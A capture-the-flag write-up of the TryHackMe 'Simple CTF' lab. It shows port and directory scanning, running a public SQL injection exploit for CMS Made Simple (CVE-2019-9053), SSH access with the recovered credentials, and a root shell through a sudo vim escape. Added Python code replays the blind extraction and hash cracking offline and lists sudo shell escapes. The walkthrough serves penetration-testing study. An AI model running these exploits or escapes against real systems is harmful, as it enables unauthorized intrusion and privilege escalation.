TryHackMe – Simple CTF

Room: https://tryhackme.com/room/easyctf

The past few days, I have been learning the actual details of cybersecurity from the All-In-One CompTIA PenTest+ Exam Guide by Ray Nutting.

Today we tackle the Simple CTF room and hopefully some of the concepts from the book will help me here again.

Enumeration

Port Scan

Always good to start with an nmap scan: nmap -v -A 10.10.147.64 (-A turns on OS detection, version detection, default NSE scripts and traceroute; without -p- it only covers nmap's top 1000 ports, which is enough here). This nets us 3 open ports:

  • 21/tcp – ftp – vsftpd 3.0.3
    • Anonymous FTP login allowed
  • 80/tcp – http – Apache httpd 2.4.18 ((Ubuntu))
  • 2222/tcp – ssh – OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (SSH on a non-standard port; remember the -p flag later)

Web Scan

We know there is a web server on port 80. It only shows the default Apache 2 Ubuntu page, so we run gobuster to brute-force directories and files on it:

gobuster dir -u 10.10.147.64 -w /usr/share/wordlists/dirb/common.txt
===============================================================
2021/03/29 16:16:15 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/simple (Status: 301)
===============================================================
2021/03/29 16:16:18 Finished
===============================================================

The robots.txt and /simple are interesting, so let's check them out in the browser.

The robots.txt contains a single rule: Disallow: /openemr-5_0_1_3. Navigating to that directory returns a 404 Not Found, so nothing is actually served there; the path is a leftover hint rather than a real OpenEMR install and can be set aside.

Navigating to /simple gives us a website powered by CMS Made Simple version 2.2.8

Vulnerability Search

First, let’s start with the application that we know is running, CMS Made Simple version 2.2.8:

searchsploit cms made simple 2.2.8
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
CMS Made Simple < 2.2.10 - SQL Injection      | php/webapps/46635.py
---------------------------------------------- ---------------------------------

We get a hit! The Exploit-DB entry is for CVE-2019-9053: a Python 2 script that abuses an unauthenticated, time-based blind SQL injection in the News module to pull the password salt, username, email and password hash out of the database, and can then crack the hash against a wordlist. I copied the text into sublime editor, and saved it as ~/cve.py.

Now we just need to run the script. It needs python2 with the requests and termcolor modules, and because every character is recovered by timing a deliberately delayed response, expect it to take a few minutes:

python2 cve.py -u http://10.10.147.64/simple --crack -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/best110.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]
[+] Password found: 0c01f4468bd75d7a84c7eb73846e----
[+] Password cracked: <redacted>
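To make clear what the exploit output above actually represents, here is an added example (written for this writeup, not the 46635.py script and not part of the original post) that replays its two steps offline: character-by-character extraction through a yes/no oracle, and an offline dictionary attack on the recovered hash. CMS Made Simple 2.2.x stores user passwords as md5(salt + password). The salt is the value the writeup's run printed; the username, the password "correcthorse", the wordlist and the local oracle are constructed stand-ins for the target's database and the SLEEP()-based timing channel.

```python
import hashlib
import string

# Constructed sample values standing in for the target's database so the
# extraction and cracking logic runs offline. The salt is the one the writeup's
# exploit run printed; the username, password and wordlist are made up here.
SAMPLE_SALT = "1dac0d92e9fa6bb2"
SAMPLE_USER = "mitch"
SAMPLE_PASSWORD = "correcthorse"
SAMPLE_WORDLIST = ["password", "letmein", "correcthorse", "qwerty"]

# Characters the blind extraction tries at each position: enough for usernames,
# e-mail addresses and lowercase hex digests.
CHARSET = string.ascii_lowercase + string.digits + "@._-"


def cmsms_hash(salt, password):
    """CMS Made Simple 2.2.x stores user passwords as md5(salt + password)."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def make_oracle(secret):
    """Return a yes/no oracle answering 'is character pos of the secret equal to ch?'.

    The real exploit asks the same question through the vulnerable m1_idlist
    parameter: the injected query calls SLEEP() when the guess is right, and the
    delayed HTTP response is the 'yes'. Here the answer is computed locally.
    """
    def oracle(pos, ch):
        return pos < len(secret) and secret[pos] == ch
    return oracle


def extract_blind(oracle, charset=CHARSET, max_len=64):
    """Recover a string one character at a time from boolean answers only."""
    recovered = []
    for pos in range(max_len):
        for ch in charset:
            if oracle(pos, ch):
                recovered.append(ch)
                break
        else:
            # No candidate matched: we have walked past the end of the string.
            break
    return "".join(recovered)


def crack(salt, target_hash, wordlist):
    """Offline dictionary attack on a salted CMSMS hash; None if no word matches."""
    for word in wordlist:
        if cmsms_hash(salt, word) == target_hash:
            return word
    return None


def run_demo():
    """Replay the exploit's steps: extract salt, user and hash, then crack the hash."""
    stored_hash = cmsms_hash(SAMPLE_SALT, SAMPLE_PASSWORD)  # what the DB would hold
    salt = extract_blind(make_oracle(SAMPLE_SALT))
    user = extract_blind(make_oracle(SAMPLE_USER))
    pw_hash = extract_blind(make_oracle(stored_hash))
    return {"salt": salt, "username": user, "hash": pw_hash,
            "password": crack(salt, pw_hash, SAMPLE_WORDLIST)}


if __name__ == "__main__":
    for key, value in run_demo().items():
        print("[+] %s: %s" % (key, value))
```

Two things the replay makes obvious about the real run: the cost is one request per candidate character per position (a 32-character hex digest alone is hundreds of timed requests, which is why the script is slow), and the cracking step never touches the server, so a strong password or a slow hash would have left mitch's account safe even though the injection itself succeeded.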

Gaining Access

With one set of credentials pulled from the database, we check whether the user reuses them on other services, starting with SSH on its non-standard port: ssh mitch@10.10.147.64 -p 2222. He does, and we have a shell. Let's look around.

  • There is a user.txt file in mitch's home directory; cat it for the first flag.
  • cd .. (i.e. ls /home) reveals another user, sunbath.
  • sudo -l reveals that mitch may run vim as root without a password (a NOPASSWD entry).
    • This is our entry point for PrivEsc; GTFOBins lists the exact syntax for breaking out of vim.

PrivEsc

Searching for vim on GTFOBins gives this command for a root shell:

sudo vim -c ':!/bin/sh'

This works because sudo starts vim as root and the :! command runs an arbitrary shell command from inside the editor, so the child /bin/sh inherits root. Verify with whoami (or id), then cd /root and cat the root.txt file in that directory!
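The sudo -l check above is the kind of thing worth scripting on every box you land on. The following added example (written for this writeup, not a GTFOBins or TryHackMe tool) parses sudo -l output and flags rules that run as root through a binary known to spawn a shell. The sample output is constructed to match what the writeup describes for mitch, with a made-up hostname and an extra rule for less and find; the escape table is a small subset of GTFOBins sudo entries reproduced from memory.

```python
import re

# Constructed sudo -l output modelled on the writeup (vim runnable as root
# without a password); the hostname and the extra less/find rule are made up.
SAMPLE_SUDO_L = """\
Matching Defaults entries for mitch on Machine:
    env_reset, mail_badpass

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/less, /usr/bin/find
"""

# Subset of GTFOBins "sudo" entries, from memory: binaries that hand back a
# shell when they run as root, with the escape to type.
SHELL_ESCAPES = {
    "vim": "sudo vim -c ':!/bin/sh'",
    "vi": "sudo vi -c ':!/bin/sh' /dev/null",
    "less": "sudo less /etc/profile   (then type !/bin/sh)",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "awk": "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "python": "sudo python -c 'import os; os.system(\"/bin/sh\")'",
}

# A rule line looks like: "(runas[ : group]) TAG: TAG: /path/cmd args, /path/cmd2"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output):
    """Return (runas_user, nopasswd, command) for every command in sudo -l output."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True        # everything after this header is a rule
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()   # drop the ": group" part
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            if cmd.strip():
                rules.append((runas, nopasswd, cmd.strip()))
    return rules


def audit(output):
    """Return (command, nopasswd, escape) for each rule that yields a root shell."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(output):
        if runas not in ("root", "ALL"):
            continue
        if cmd == "ALL":
            findings.append((cmd, nopasswd, "sudo /bin/sh"))
            continue
        binary = cmd.split()[0].rsplit("/", 1)[-1]   # basename of the first word
        if binary in SHELL_ESCAPES:
            findings.append((cmd, nopasswd, SHELL_ESCAPES[binary]))
    return findings


if __name__ == "__main__":
    for cmd, nopasswd, escape in audit(SAMPLE_SUDO_L):
        print("%s%s -> %s" % (cmd, " (no password)" if nopasswd else "", escape))
```

The same parser is useful on the defensive side: run it over the output of sudo -l -U <user> for each account and any finding is a sudoers entry that is effectively "ALL", whatever the rule author intended.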
